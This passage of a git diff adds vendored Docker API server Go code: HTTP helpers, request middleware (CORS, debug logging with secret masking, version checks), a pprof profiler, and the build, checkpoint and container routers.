+ if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + } +} + +func TestInt64ValueOrDefault(t *testing.T) { + cases := map[string]int64{ + "": -1, + "-1": -1, + "42": 42, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a, err := Int64ValueOrDefault(r, "test", -1) + if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + if err != nil { + t.Fatalf("Error should be nil, but received: %s", err) + } + } +} + +func TestInt64ValueOrDefaultWithError(t *testing.T) { + v := url.Values{} + v.Set("test", "invalid") + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + _, err := Int64ValueOrDefault(r, "test", -1) + if err == nil { + t.Fatalf("Expected an error.") + } +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils.go b/vendor/github.com/docker/docker/api/server/httputils/httputils.go new file mode 100644 index 0000000000..7930ff7a07 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils.go @@ -0,0 +1,90 @@ +package httputils + +import ( + "fmt" + "io" + "net/http" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api" +) + +// APIVersionKey is the client's requested API version. +const APIVersionKey = "api-version" + +// UAStringKey is used as key type for user-agent string in net/context struct +const UAStringKey = "upstream-user-agent" + +// APIFunc is an adapter to allow the use of ordinary functions as Docker API endpoints. +// Any function that has the appropriate signature can be registered as an API endpoint (e.g. getVersion). +type APIFunc func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error + +// HijackConnection interrupts the http response writer to get the +// underlying connection and operate with it. 
+func HijackConnection(w http.ResponseWriter) (io.ReadCloser, io.Writer, error) { + conn, _, err := w.(http.Hijacker).Hijack() + if err != nil { + return nil, nil, err + } + // Flush the options to make sure the client sets the raw mode + conn.Write([]byte{}) + return conn, conn, nil +} + +// CloseStreams ensures that a list for http streams are properly closed. +func CloseStreams(streams ...interface{}) { + for _, stream := range streams { + if tcpc, ok := stream.(interface { + CloseWrite() error + }); ok { + tcpc.CloseWrite() + } else if closer, ok := stream.(io.Closer); ok { + closer.Close() + } + } +} + +// CheckForJSON makes sure that the request's Content-Type is application/json. +func CheckForJSON(r *http.Request) error { + ct := r.Header.Get("Content-Type") + + // No Content-Type header is ok as long as there's no Body + if ct == "" { + if r.Body == nil || r.ContentLength == 0 { + return nil + } + } + + // Otherwise it better be json + if api.MatchesContentType(ct, "application/json") { + return nil + } + return fmt.Errorf("Content-Type specified (%s) must be 'application/json'", ct) +} + +// ParseForm ensures the request form is parsed even with invalid content types. +// If we don't do this, POST method without Content-type (even with empty body) will fail. +func ParseForm(r *http.Request) error { + if r == nil { + return nil + } + if err := r.ParseForm(); err != nil && !strings.HasPrefix(err.Error(), "mime:") { + return err + } + return nil +} + +// VersionFromContext returns an API version from the context using APIVersionKey. +// It panics if the context value does not have version.Version type. 
+func VersionFromContext(ctx context.Context) (ver string) { + if ctx == nil { + return + } + val := ctx.Value(APIVersionKey) + if val == nil { + return + } + return val.(string) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go new file mode 100644 index 0000000000..4787cc3c33 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go @@ -0,0 +1,17 @@ +// +build go1.7 + +package httputils + +import ( + "encoding/json" + "net/http" +) + +// WriteJSON writes the value v to the http response stream as json with standard json encoding. +func WriteJSON(w http.ResponseWriter, code int, v interface{}) error { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(code) + enc := json.NewEncoder(w) + enc.SetEscapeHTML(false) + return enc.Encode(v) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go new file mode 100644 index 0000000000..bdc6981738 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go @@ -0,0 +1,16 @@ +// +build go1.6,!go1.7 + +package httputils + +import ( + "encoding/json" + "net/http" +) + +// WriteJSON writes the value v to the http response stream as json with standard json encoding. 
+func WriteJSON(w http.ResponseWriter, code int, v interface{}) error { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(code) + enc := json.NewEncoder(w) + return enc.Encode(v) +} diff --git a/vendor/github.com/docker/docker/api/server/middleware.go b/vendor/github.com/docker/docker/api/server/middleware.go new file mode 100644 index 0000000000..537ce8028f --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware.go @@ -0,0 +1,24 @@ +package server + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" +) + +// handlerWithGlobalMiddlewares wraps the handler function for a request with +// the server's global middlewares. The order of the middlewares is backwards, +// meaning that the first in the list will be evaluated last. +func (s *Server) handlerWithGlobalMiddlewares(handler httputils.APIFunc) httputils.APIFunc { + next := handler + + for _, m := range s.middlewares { + next = m.WrapHandler(next) + } + + if s.cfg.Logging && logrus.GetLevel() == logrus.DebugLevel { + next = middleware.DebugRequestMiddleware(next) + } + + return next +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/cors.go b/vendor/github.com/docker/docker/api/server/middleware/cors.go new file mode 100644 index 0000000000..ea725dbc72 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/cors.go @@ -0,0 +1,37 @@ +package middleware + +import ( + "net/http" + + "github.com/Sirupsen/logrus" + "golang.org/x/net/context" +) + +// CORSMiddleware injects CORS headers to each request +// when it's configured. +type CORSMiddleware struct { + defaultHeaders string +} + +// NewCORSMiddleware creates a new CORSMiddleware with default headers. +func NewCORSMiddleware(d string) CORSMiddleware { + return CORSMiddleware{defaultHeaders: d} +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. 
+func (c CORSMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // If "api-cors-header" is not given, but "api-enable-cors" is true, we set cors to "*" + // otherwise, all head values will be passed to HTTP handler + corsHeaders := c.defaultHeaders + if corsHeaders == "" { + corsHeaders = "*" + } + + logrus.Debugf("CORS header is enabled and set to: %s", corsHeaders) + w.Header().Add("Access-Control-Allow-Origin", corsHeaders) + w.Header().Add("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth") + w.Header().Add("Access-Control-Allow-Methods", "HEAD, GET, POST, DELETE, PUT, OPTIONS") + return handler(ctx, w, r, vars) + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/debug.go b/vendor/github.com/docker/docker/api/server/middleware/debug.go new file mode 100644 index 0000000000..8c8567669b --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/debug.go @@ -0,0 +1,76 @@ +package middleware + +import ( + "bufio" + "encoding/json" + "io" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/pkg/ioutils" + "golang.org/x/net/context" +) + +// DebugRequestMiddleware dumps the request to logger +func DebugRequestMiddleware(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + logrus.Debugf("Calling %s %s", r.Method, r.RequestURI) + + if r.Method != "POST" { + return 
handler(ctx, w, r, vars) + } + if err := httputils.CheckForJSON(r); err != nil { + return handler(ctx, w, r, vars) + } + maxBodySize := 4096 // 4KB + if r.ContentLength > int64(maxBodySize) { + return handler(ctx, w, r, vars) + } + + body := r.Body + bufReader := bufio.NewReaderSize(body, maxBodySize) + r.Body = ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() }) + + b, err := bufReader.Peek(maxBodySize) + if err != io.EOF { + // either there was an error reading, or the buffer is full (in which case the request is too large) + return handler(ctx, w, r, vars) + } + + var postForm map[string]interface{} + if err := json.Unmarshal(b, &postForm); err == nil { + maskSecretKeys(postForm) + formStr, errMarshal := json.Marshal(postForm) + if errMarshal == nil { + logrus.Debugf("form data: %s", string(formStr)) + } else { + logrus.Debugf("form data: %q", postForm) + } + } + + return handler(ctx, w, r, vars) + } +} + +func maskSecretKeys(inp interface{}) { + if arr, ok := inp.([]interface{}); ok { + for _, f := range arr { + maskSecretKeys(f) + } + return + } + if form, ok := inp.(map[string]interface{}); ok { + loop0: + for k, v := range form { + for _, m := range []string{"password", "secret", "jointoken", "unlockkey"} { + if strings.EqualFold(m, k) { + form[k] = "*****" + continue loop0 + } + } + maskSecretKeys(v) + } + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/experimental.go b/vendor/github.com/docker/docker/api/server/middleware/experimental.go new file mode 100644 index 0000000000..b8f56e88b4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/experimental.go @@ -0,0 +1,29 @@ +package middleware + +import ( + "net/http" + + "golang.org/x/net/context" +) + +// ExperimentalMiddleware is a the middleware in charge of adding the +// 'Docker-Experimental' header to every outgoing request +type ExperimentalMiddleware struct { + experimental string +} + +// NewExperimentalMiddleware creates a new 
ExperimentalMiddleware +func NewExperimentalMiddleware(experimentalEnabled bool) ExperimentalMiddleware { + if experimentalEnabled { + return ExperimentalMiddleware{"true"} + } + return ExperimentalMiddleware{"false"} +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (e ExperimentalMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + w.Header().Set("Docker-Experimental", e.experimental) + return handler(ctx, w, r, vars) + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/middleware.go b/vendor/github.com/docker/docker/api/server/middleware/middleware.go new file mode 100644 index 0000000000..dc1f5bfa0d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/middleware.go @@ -0,0 +1,13 @@ +package middleware + +import ( + "net/http" + + "golang.org/x/net/context" +) + +// Middleware is an interface to allow the use of ordinary functions as Docker API filters. +// Any struct that has the appropriate signature can be registered as a middleware. 
+type Middleware interface { + WrapHandler(func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/version.go b/vendor/github.com/docker/docker/api/server/middleware/version.go new file mode 100644 index 0000000000..11014659e5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/version.go @@ -0,0 +1,50 @@ +package middleware + +import ( + "fmt" + "net/http" + "runtime" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// VersionMiddleware is a middleware that +// validates the client and server versions. +type VersionMiddleware struct { + serverVersion string + defaultVersion string + minVersion string +} + +// NewVersionMiddleware creates a new VersionMiddleware +// with the default versions. +func NewVersionMiddleware(s, d, m string) VersionMiddleware { + return VersionMiddleware{ + serverVersion: s, + defaultVersion: d, + minVersion: m, + } +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (v VersionMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + apiVersion := vars["version"] + if apiVersion == "" { + apiVersion = v.defaultVersion + } + + if versions.LessThan(apiVersion, v.minVersion) { + return errors.NewBadRequestError(fmt.Errorf("client version %s is too old. 
Minimum supported API version is %s, please upgrade your client to a newer version", apiVersion, v.minVersion)) + } + + header := fmt.Sprintf("Docker/%s (%s)", v.serverVersion, runtime.GOOS) + w.Header().Set("Server", header) + w.Header().Set("API-Version", v.defaultVersion) + ctx = context.WithValue(ctx, "api-version", apiVersion) + return handler(ctx, w, r, vars) + } + +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/version_test.go b/vendor/github.com/docker/docker/api/server/middleware/version_test.go new file mode 100644 index 0000000000..9e72efd78d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/version_test.go @@ -0,0 +1,57 @@ +package middleware + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +func TestVersionMiddleware(t *testing.T) { + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + return nil + } + + defaultVersion := "1.10.0" + minVersion := "1.2.0" + m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion) + h := m.WrapHandler(handler) + + req, _ := http.NewRequest("GET", "/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + if err := h(ctx, resp, req, map[string]string{}); err != nil { + t.Fatal(err) + } +} + +func TestVersionMiddlewareWithErrors(t *testing.T) { + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + return nil + } + + defaultVersion := "1.10.0" + minVersion := "1.2.0" + m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion) + h := m.WrapHandler(handler) + + req, _ := http.NewRequest("GET", 
"/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + + vars := map[string]string{"version": "0.1"} + err := h(ctx, resp, req, vars) + + if !strings.Contains(err.Error(), "client version 0.1 is too old. Minimum supported API version is 1.2.0") { + t.Fatalf("Expected too old client error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/api/server/profiler.go b/vendor/github.com/docker/docker/api/server/profiler.go new file mode 100644 index 0000000000..8bf8384fdb --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/profiler.go @@ -0,0 +1,41 @@ +package server + +import ( + "expvar" + "fmt" + "net/http" + "net/http/pprof" + + "github.com/gorilla/mux" +) + +const debugPathPrefix = "/debug/" + +func profilerSetup(mainRouter *mux.Router) { + var r = mainRouter.PathPrefix(debugPathPrefix).Subrouter() + r.HandleFunc("/vars", expVars) + r.HandleFunc("/pprof/", pprof.Index) + r.HandleFunc("/pprof/cmdline", pprof.Cmdline) + r.HandleFunc("/pprof/profile", pprof.Profile) + r.HandleFunc("/pprof/symbol", pprof.Symbol) + r.HandleFunc("/pprof/trace", pprof.Trace) + r.HandleFunc("/pprof/block", pprof.Handler("block").ServeHTTP) + r.HandleFunc("/pprof/heap", pprof.Handler("heap").ServeHTTP) + r.HandleFunc("/pprof/goroutine", pprof.Handler("goroutine").ServeHTTP) + r.HandleFunc("/pprof/threadcreate", pprof.Handler("threadcreate").ServeHTTP) +} + +// Replicated from expvar.go as not public. 
+func expVars(w http.ResponseWriter, r *http.Request) { + first := true + w.Header().Set("Content-Type", "application/json; charset=utf-8") + fmt.Fprintf(w, "{\n") + expvar.Do(func(kv expvar.KeyValue) { + if !first { + fmt.Fprintf(w, ",\n") + } + first = false + fmt.Fprintf(w, "%q: %s", kv.Key, kv.Value) + }) + fmt.Fprintf(w, "\n}\n") +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/backend.go b/vendor/github.com/docker/docker/api/server/router/build/backend.go new file mode 100644 index 0000000000..0f01c11af4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/backend.go @@ -0,0 +1,20 @@ +package build + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "golang.org/x/net/context" +) + +// Backend abstracts an image builder whose only purpose is to build an image referenced by an imageID. +type Backend interface { + // Build builds a Docker image referenced by an imageID string. + // + // Note: Tagging an image should not be done by a Builder, it should instead be done + // by the caller. 
+ // + // TODO: make this return a reference instead of string + BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/build.go b/vendor/github.com/docker/docker/api/server/router/build/build.go new file mode 100644 index 0000000000..959498e0f1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/build.go @@ -0,0 +1,29 @@ +package build + +import "github.com/docker/docker/api/server/router" + +// buildRouter is a router to talk with the build controller +type buildRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new build router +func NewRouter(b Backend) router.Router { + r := &buildRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the build controller +func (r *buildRouter) Routes() []router.Route { + return r.routes +} + +func (r *buildRouter) initRoutes() { + r.routes = []router.Route{ + router.Cancellable(router.NewPostRoute("/build", r.postBuild)), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/build_routes.go b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go new file mode 100644 index 0000000000..75425b19fb --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go @@ -0,0 +1,225 @@ +package build + +import ( + "bytes" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "runtime" + "strconv" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + 
"github.com/docker/docker/pkg/streamformatter" + "github.com/docker/go-units" + "golang.org/x/net/context" +) + +func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBuildOptions, error) { + version := httputils.VersionFromContext(ctx) + options := &types.ImageBuildOptions{} + if httputils.BoolValue(r, "forcerm") && versions.GreaterThanOrEqualTo(version, "1.12") { + options.Remove = true + } else if r.FormValue("rm") == "" && versions.GreaterThanOrEqualTo(version, "1.12") { + options.Remove = true + } else { + options.Remove = httputils.BoolValue(r, "rm") + } + if httputils.BoolValue(r, "pull") && versions.GreaterThanOrEqualTo(version, "1.16") { + options.PullParent = true + } + + options.Dockerfile = r.FormValue("dockerfile") + options.SuppressOutput = httputils.BoolValue(r, "q") + options.NoCache = httputils.BoolValue(r, "nocache") + options.ForceRemove = httputils.BoolValue(r, "forcerm") + options.MemorySwap = httputils.Int64ValueOrZero(r, "memswap") + options.Memory = httputils.Int64ValueOrZero(r, "memory") + options.CPUShares = httputils.Int64ValueOrZero(r, "cpushares") + options.CPUPeriod = httputils.Int64ValueOrZero(r, "cpuperiod") + options.CPUQuota = httputils.Int64ValueOrZero(r, "cpuquota") + options.CPUSetCPUs = r.FormValue("cpusetcpus") + options.CPUSetMems = r.FormValue("cpusetmems") + options.CgroupParent = r.FormValue("cgroupparent") + options.NetworkMode = r.FormValue("networkmode") + options.Tags = r.Form["t"] + options.SecurityOpt = r.Form["securityopt"] + options.Squash = httputils.BoolValue(r, "squash") + + if r.Form.Get("shmsize") != "" { + shmSize, err := strconv.ParseInt(r.Form.Get("shmsize"), 10, 64) + if err != nil { + return nil, err + } + options.ShmSize = shmSize + } + + if i := container.Isolation(r.FormValue("isolation")); i != "" { + if !container.Isolation.IsValid(i) { + return nil, fmt.Errorf("Unsupported isolation: %q", i) + } + options.Isolation = i + } + + if runtime.GOOS != "windows" && 
options.SecurityOpt != nil { + return nil, fmt.Errorf("the daemon on this platform does not support --security-opt to build") + } + + var buildUlimits = []*units.Ulimit{} + ulimitsJSON := r.FormValue("ulimits") + if ulimitsJSON != "" { + if err := json.Unmarshal([]byte(ulimitsJSON), &buildUlimits); err != nil { + return nil, err + } + options.Ulimits = buildUlimits + } + + var buildArgs = map[string]*string{} + buildArgsJSON := r.FormValue("buildargs") + + // Note that there are two ways a --build-arg might appear in the + // json of the query param: + // "foo":"bar" + // and "foo":nil + // The first is the normal case, ie. --build-arg foo=bar + // or --build-arg foo + // where foo's value was picked up from an env var. + // The second ("foo":nil) is where they put --build-arg foo + // but "foo" isn't set as an env var. In that case we can't just drop + // the fact they mentioned it, we need to pass that along to the builder + // so that it can print a warning about "foo" being unused if there is + // no "ARG foo" in the Dockerfile. 
+ if buildArgsJSON != "" { + if err := json.Unmarshal([]byte(buildArgsJSON), &buildArgs); err != nil { + return nil, err + } + options.BuildArgs = buildArgs + } + + var labels = map[string]string{} + labelsJSON := r.FormValue("labels") + if labelsJSON != "" { + if err := json.Unmarshal([]byte(labelsJSON), &labels); err != nil { + return nil, err + } + options.Labels = labels + } + + var cacheFrom = []string{} + cacheFromJSON := r.FormValue("cachefrom") + if cacheFromJSON != "" { + if err := json.Unmarshal([]byte(cacheFromJSON), &cacheFrom); err != nil { + return nil, err + } + options.CacheFrom = cacheFrom + } + + return options, nil +} + +type syncWriter struct { + w io.Writer + mu sync.Mutex +} + +func (s *syncWriter) Write(b []byte) (count int, err error) { + s.mu.Lock() + count, err = s.w.Write(b) + s.mu.Unlock() + return +} + +func (br *buildRouter) postBuild(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var ( + authConfigs = map[string]types.AuthConfig{} + authConfigsEncoded = r.Header.Get("X-Registry-Config") + notVerboseBuffer = bytes.NewBuffer(nil) + ) + + if authConfigsEncoded != "" { + authConfigsJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authConfigsEncoded)) + if err := json.NewDecoder(authConfigsJSON).Decode(&authConfigs); err != nil { + // for a pull it is not an error if no auth was given + // to increase compatibility with the existing api it is defaulting + // to be empty. + } + } + + w.Header().Set("Content-Type", "application/json") + + output := ioutils.NewWriteFlusher(w) + defer output.Close() + sf := streamformatter.NewJSONStreamFormatter() + errf := func(err error) error { + if httputils.BoolValue(r, "q") && notVerboseBuffer.Len() > 0 { + output.Write(notVerboseBuffer.Bytes()) + } + // Do not write the error in the http output if it's still empty. + // This prevents from writing a 200(OK) when there is an internal error. 
+ if !output.Flushed() { + return err + } + _, err = w.Write(sf.FormatError(err)) + if err != nil { + logrus.Warnf("could not write error response: %v", err) + } + return nil + } + + buildOptions, err := newImageBuildOptions(ctx, r) + if err != nil { + return errf(err) + } + buildOptions.AuthConfigs = authConfigs + + remoteURL := r.FormValue("remote") + + // Currently, only used if context is from a remote url. + // Look at code in DetectContextFromRemoteURL for more information. + createProgressReader := func(in io.ReadCloser) io.ReadCloser { + progressOutput := sf.NewProgressOutput(output, true) + if buildOptions.SuppressOutput { + progressOutput = sf.NewProgressOutput(notVerboseBuffer, true) + } + return progress.NewProgressReader(in, progressOutput, r.ContentLength, "Downloading context", remoteURL) + } + + out := io.Writer(output) + if buildOptions.SuppressOutput { + out = notVerboseBuffer + } + out = &syncWriter{w: out} + stdout := &streamformatter.StdoutFormatter{Writer: out, StreamFormatter: sf} + stderr := &streamformatter.StderrFormatter{Writer: out, StreamFormatter: sf} + + pg := backend.ProgressWriter{ + Output: out, + StdoutFormatter: stdout, + StderrFormatter: stderr, + ProgressReaderFunc: createProgressReader, + } + + imgID, err := br.backend.BuildFromContext(ctx, r.Body, remoteURL, buildOptions, pg) + if err != nil { + return errf(err) + } + + // Everything worked so if -q was provided the output from the daemon + // should be just the image ID and we'll print that to stdout. 
+ if buildOptions.SuppressOutput { + stdout := &streamformatter.StdoutFormatter{Writer: output, StreamFormatter: sf} + fmt.Fprintf(stdout, "%s\n", string(imgID)) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go new file mode 100644 index 0000000000..8810f88b72 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go @@ -0,0 +1,10 @@ +package checkpoint + +import "github.com/docker/docker/api/types" + +// Backend for Checkpoint +type Backend interface { + CheckpointCreate(container string, config types.CheckpointCreateOptions) error + CheckpointDelete(container string, config types.CheckpointDeleteOptions) error + CheckpointList(container string, config types.CheckpointListOptions) ([]types.Checkpoint, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go new file mode 100644 index 0000000000..c1e93926f5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go @@ -0,0 +1,36 @@ +package checkpoint + +import ( + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/router" +) + +// checkpointRouter is a router to talk with the checkpoint controller +type checkpointRouter struct { + backend Backend + decoder httputils.ContainerDecoder + routes []router.Route +} + +// NewRouter initializes a new checkpoint router +func NewRouter(b Backend, decoder httputils.ContainerDecoder) router.Router { + r := &checkpointRouter{ + backend: b, + decoder: decoder, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the checkpoint controller +func (r *checkpointRouter) Routes() []router.Route { + return r.routes +} + +func (r *checkpointRouter) initRoutes() { + r.routes = []router.Route{ + 
router.Experimental(router.NewGetRoute("/containers/{name:.*}/checkpoints", r.getContainerCheckpoints)), + router.Experimental(router.NewPostRoute("/containers/{name:.*}/checkpoints", r.postContainerCheckpoint)), + router.Experimental(router.NewDeleteRoute("/containers/{name}/checkpoints/{checkpoint}", r.deleteContainerCheckpoint)), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go new file mode 100644 index 0000000000..f988431191 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go @@ -0,0 +1,65 @@ +package checkpoint + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func (s *checkpointRouter) postContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + var options types.CheckpointCreateOptions + + decoder := json.NewDecoder(r.Body) + if err := decoder.Decode(&options); err != nil { + return err + } + + err := s.backend.CheckpointCreate(vars["name"], options) + if err != nil { + return err + } + + w.WriteHeader(http.StatusCreated) + return nil +} + +func (s *checkpointRouter) getContainerCheckpoints(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + checkpoints, err := s.backend.CheckpointList(vars["name"], types.CheckpointListOptions{ + CheckpointDir: r.Form.Get("dir"), + }) + + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, checkpoints) +} + +func (s *checkpointRouter) deleteContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err 
:= httputils.ParseForm(r); err != nil { + return err + } + + err := s.backend.CheckpointDelete(vars["name"], types.CheckpointDeleteOptions{ + CheckpointDir: r.Form.Get("dir"), + CheckpointID: vars["checkpoint"], + }) + + if err != nil { + return err + } + + w.WriteHeader(http.StatusNoContent) + return nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/container/backend.go b/vendor/github.com/docker/docker/api/server/router/container/backend.go new file mode 100644 index 0000000000..0d20188ccf --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/container/backend.go @@ -0,0 +1,79 @@ +package container + +import ( + "io" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/pkg/archive" +) + +// execBackend includes functions to implement to provide exec functionality. +type execBackend interface { + ContainerExecCreate(name string, config *types.ExecConfig) (string, error) + ContainerExecInspect(id string) (*backend.ExecInspect, error) + ContainerExecResize(name string, height, width int) error + ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) error + ExecExists(name string) (bool, error) +} + +// copyBackend includes functions to implement to provide container copy functionality. 
+type copyBackend interface { + ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error) + ContainerCopy(name string, res string) (io.ReadCloser, error) + ContainerExport(name string, out io.Writer) error + ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error + ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error) +} + +// stateBackend includes functions to implement to provide container state lifecycle functionality. +type stateBackend interface { + ContainerCreate(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + ContainerKill(name string, sig uint64) error + ContainerPause(name string) error + ContainerRename(oldName, newName string) error + ContainerResize(name string, height, width int) error + ContainerRestart(name string, seconds *int) error + ContainerRm(name string, config *types.ContainerRmConfig) error + ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + ContainerStop(name string, seconds *int) error + ContainerUnpause(name string) error + ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error) + ContainerWait(name string, timeout time.Duration) (int, error) +} + +// monitorBackend includes functions to implement to provide containers monitoring functionality. 
